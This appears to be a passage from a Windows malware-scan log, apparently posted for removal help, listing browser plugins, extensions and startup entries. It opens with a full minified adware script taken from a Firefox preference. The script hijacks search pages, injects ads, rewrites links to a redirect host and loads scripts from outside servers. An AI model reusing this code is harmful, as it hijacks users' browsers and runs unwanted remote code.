infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"== a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\", tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0], !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\", validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault(): a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a&&(a=a.replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description}, {replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\"); if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&& __yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at; break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point=d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems= function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"== typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node= b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a; if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name= a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)}; b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=6899089849660189780&eid=78&pid=2111&prid=186\"; \"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=458516&ext=BuyNsave&systemid=6899089849660189780&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=78_2111&hid=6899089849660189780&bname=BuyNsave\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=78_2111&hid=6899089849660189780&bname=BuyNsave\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=458516&ext=BuyNsave&systemid=6899089849660189780&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG4ZhyqZC7YKg70Jv6qTCMVEDc0EgeqRg6bJvNbOCd0GojsGrjUErchXCMhMofb5vNbIDeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1749/l.js?aoi=1311798366&pid=1749&zoneid=458516&ext=BuyNsave&systemid=6899089849660189780&ext=BuyNsave\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=BuyNsave&subid=78_2111\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=78_2111&appname=BuyNsave\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;try{new function() {if (!document.getElementById(\"sdfgdfg43iddfhgfs43af\") && window.self == window.top && document.getElementsByTagName(\"body\").length ) {var a = document.createElement(\"script\");a.setAttribute(\"id\", \"sdfgdfg43iddfhgfs43af\");a.src = \"https://www.tr553.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=78_2111&ecpm=0&debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=BuyNsave&endpoint=https%3A%2F%2Fwww.tr553.com\";document.getElementsByTagName(\"body\")[0].appendChild(a)}};}catch(e){}\r\n})();}catch(e){}");
FF - prefs.js..extensions.enabledAddons: foxmarks%40kei.com:4.3.6
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:34.0.5
FF - user.js - File not found
 
FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.72.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.72.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@nds.com/PlayerPlugin: C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
FF - HKCU\Software\MozillaPlugins\@nds.com/PlayerPlugin64: C:\Users\John\AppData\Local\DIRECTV Player\win64\npPlayerPlugin64.dll (Cisco)
FF - HKCU\Software\MozillaPlugins\NDS.com/PlayerPlugin: C:\Users\John\AppData\Local\DIRECTV Player\npPlayerPlugin.dll (Cisco)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 34.0.5\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2014/01/13 15:58:48 | 000,000,000 | ---D | M] (No name found) -- C:\Users\John\AppData\Roaming\Mozilla\Extensions
[2014/12/17 20:26:02 | 000,000,000 | ---D | M] (No name found) -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\extensions
[2014/12/16 12:14:30 | 000,000,000 | ---D | M] (YoutuubeAdBllooCke) -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\extensions\[email protected]
[2014/12/14 03:20:47 | 000,000,000 | ---D | M] (Ads Removal) -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\extensions\[email protected]
[2014/09/22 17:52:33 | 000,000,000 | ---D | M] (Advanced SystemCare Surfing Protection) -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\extensions\[email protected]
[2014/11/23 18:05:40 | 000,000,000 | ---D | M] ("Xmarks") -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\extensions\[email protected]
[2014/12/26 12:14:02 | 000,002,526 | ---- | M] () -- C:\Users\John\AppData\Roaming\Mozilla\Firefox\Profiles\zfddampy.default-1396900832420\searchplugins\securesearch.xml
[2014/12/16 16:02:35 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/12/10 11:27:32 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url = http://api.bing.com/...age={language},
CHR - plugin: Error reading preferences file
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\
CHR - Extension: Free Visio Viewer = C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcpmofnlkemfkhgngcdppgbhncoflmpe\114\
CHR - Extension: Advanced SystemCare Surfing Protection = C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfengeggddojhakldhlpjdlddgkkjkdd\1.0.0_1\
CHR - Extension: Google Wallet = C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
 
O1 HOSTS File: ([2009/06/10 15:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (CIESpeechBHO Class) - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm®Atheros®)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Ads Removal) - {9D974C8C-6D92-44FB-BEAF-B45A1C0CF17F} - C:\Program Files (x86)\IObit\IObit Malware Fighter\adsremoval\IE\Adblock.dll (Adblock)
O2 - BHO: (Advanced SystemCare Browser Protection) - {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} - C:\Program Files (x86)\IObit\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll (IObit)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IAStorIcon] C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [QuickSet] c:\Program Files\Dell\QuickSet\quickset.exe (Dell Inc.)
O4:[b]64bit:
- HKLM..\Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [RtHDVBg_PushButton] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [WavesSvc] C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe (Waves Audio Ltd.)
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [Dell Webcam Central] C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [EEventManager] C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe (SEIKO EPSON CORPORATION)
O4 - HKLM..\Run: [IObit Malware Fighter] C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe (IObit)
O4 - HKCU..\Run: [Advanced SystemCare 7] C:\Program Files (x86)\IObit\Advanced SystemCare 7\ASCTray.exe (IObit)
O4 - HKCU..\Run: [PCShowServer] C:\Users\John\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe (Cisco)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run: BtvStack = "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe" (Qualcomm®Atheros®)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableCAD = 1
O8:[b]64bit:
- Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200 File not found
O8 - Extra context menu item: Add to Google Photos Screensa&ver - C:\Windows\SysWow64\GPhotos.scr (Google Inc.)
O9:[b]64bit:
